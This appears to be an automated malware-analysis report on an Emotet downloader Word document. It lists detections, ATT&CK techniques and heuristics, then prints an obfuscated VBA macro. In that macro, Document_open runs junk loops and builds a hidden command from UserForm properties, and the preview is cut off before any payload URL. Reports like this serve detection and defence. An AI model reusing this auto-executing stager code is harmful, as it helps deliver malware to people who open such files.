Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7464351-0. Critical heuristics indicate the presence of a VBA UserForm hidden-property command stager, which is designed to auto-execute and likely download a second-stage payload. The Document_Open macro is present, further supporting the execution of malicious code upon opening the document.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-7464351-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7464351-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10680 bytes | 735c7348189bec3d0f5209f59be363cada8ae1ff8fd2e6a4a9c83a586a7dd0fa |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Ohzfpovte"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Okwrtmcmokcs, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Vgvlvktybvj
Case Kyysnhlim
Rzciwhkfx = Sin(Wtqtbsugkd)
Zcdfgxdfjspuw = CStr(Cukeicybec)
Sngcbgacg = 324
Ehuyceev = Sin(Hslazcwaaycm)
Rdpoovfeir = CStr(Ndvxagwnkvucc)
Cguzrrkh = 567
Qhbodjttcpt = Sin(Yvqdawjm)
Sdyospfdww = CStr(Zvyglajank)
Vebnjkqb = 5645
End Select
For Jkfubdwmxitow = Tlidlxifu To Ostlfifdmnb
While Fdbmokhhgipyh <> Yafkbnpesldk
Iqsukxiwvrkl = Jemxkmeli * Atn(Kpyiblzyoxr) * (Xalcfozqh + Oyfawpxibfzh)
Wend
Next
Select Case Wmrasvwsic
Case Lvwgaxvcvafmh
Gfxcdgblx = Sin(Zepcdabr)
Qfblmjnvh = CStr(Fpqmkaqpkjyp)
Qmtxfkpnapawq = 324
Oqqljtpyptalb = Sin(Sqdnvwuycudso)
Ojzsvshdne = CStr(Deeznxexjsd)
Usoqgbax = 567
Qmiudknqi = Sin(Quxvpvkddv)
Sbasmgda = CStr(Znnfdamw)
Brdyqvrfquzj = 5645
End Select
For Qtdrbjftsq = Ikrjrhsmbb To Brpxkwbp
While Pkxuutpi <> Dgmhohcrryh
Apjuhjwofhevh = Myxtcjzvehjct * Atn(Ewaowelzhzczx) * (Mgwgfsaol + Ufmxgdfg)
Wend
Next
Select Case Lwvpsjsqzamt
Case Igfsjmpam
Brbnflat = Sin(Zqrjrxuzwqxjq)
Nvumfkkhl = CStr(Rdtpmzqlipoj)
Vbqxfsbjfsq = 324
Rlpjfsagq = Sin(Exsejrzlc)
Itjfypixaz = CStr(Zatgiqrhewjt)
Xantedjhcvzzu = 567
Sehyeteplqulq = Sin(Kqxysikhuc)
Xygjwgjmrbvd = CStr(Kbcjrtbqlicv)
Iwnwvcgqfhy = 5645
End Select
For Tvivtszxi = Kqpgnygaot To Ozhdmuwvlmmi
While Nidtsarc <> Mzdgaxqnq
Wlpmdlkzxdhl = Yxuacdlncr * Atn(Punvyruiqwn) * (Pgdobfoswca + Nxijjxzmvp)
Wend
Next
Hlapdnjk
End Sub
Attribute VB_Name = "Svwebryswbx"
Attribute VB_Base = "0{E63A8E29-ECBB-4891-834E-6C8A7EB38957}{AC36B4C4-DB8F-4E14-AAD0-E9DD8E767F8E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Syiycnhxkbedn"
Function Pvpmmwkzwdlme()
Select Case Wsmdwaydefns
Case Keeepqlxzrhu
Epaikfajghwan = Sin(Dvbmvbzswra)
Tuwbqazpefint = CStr(Xiocaivvgiove)
Rjybplku = 324
Mzyqsybzbvn = Sin(Grxzqtbfusaoy)
Mmmoepoixenj = CStr(Ccqokrjsltaii)
Yctjinpiz = 567
Siaudjojrq = Sin(Oxjubsnvhwbyc)
Eintrrbz = CStr(Qqqtyarocfmz)
Plbbwhbskjj = 5645
End Select
For Wsimyick = Ciwjkznnfozdf To Ctqyggky
While Wutnqqdnoztz <> Swweldtmtmvp
Wqskapofua = Wqrphcvyfjkgm * Atn(Jbhsberr) * (Izidncvpn + Udesungm)
Wend
Next
Dwyjwtrbgp = Ohzfpovte.Okwrtmcmokcs
Select Case Apeitobvjaxx
Case Akvcidef
Ikyjtfnwfmq = Sin(Nxbeozgfwtbl)
Rnenvunaips = CStr(Mbrnlvpi)
Zpgollqxy = 324
Wiayukhmoml = Sin(Teefpqnglhey)
Cprsulnqt = CStr(Qkhvqundlvh)
Hidjkavafe = 567
Wtrahclnqzffl = Sin(Rudkvjglli)
Svpkfcytb = CStr(Esvsuhcx)
Nefcuknqhfs = 5645
End Select
For Ssapzdmblusys = Lejkfreqkhl To Dtqkbwdzus
While Mmcjmdckxedw <> Eocphnlbyseix
Qrlfqsecgxdjg = Ptcdroxekpilo * Atn(Egfogmrqr) * (Mwsdeenz + Ftehtnbqhh)
Wend
Next
Jltfxipurrvv = Dwyjwtrbgp + Svwebryswbx.Artcdlagwia + Svwebryswbx.Ojskbjakj + Svwebryswbx.Gpihqmcxuyw
Select Case Aldrmcty
Case Hmjgoeuxblzy
Siuonsultylu = Sin(Phaokhspwdpi)
Pfccgjzeif = CStr(Avtkutob)
Kloxbclryemh = 324
Wjohtkzvcgh = Sin(Miwueevuqoihw)
Ghrszfolfhi = CStr(Pihqefyicjid)
Fugzxriovooy = 567
Xqnwhafigrcqu = Sin(Xjpxmiqyh)
Mamtcgoal = CStr(Lvanxopxgwaky)
Afpgsflbofvno = 5645
End Select
For Twtbxuxz = Jkejlqon To Jketqaumh
While Aaederxi <> Geeivhsd
Ajqsirzkw = Rjbjjzghzr * Atn(Cdgalusc) * (Uaqjmumrmles + Czmimwqqvjoo)
Wend
Next
Rplojgrhtx
... (truncated)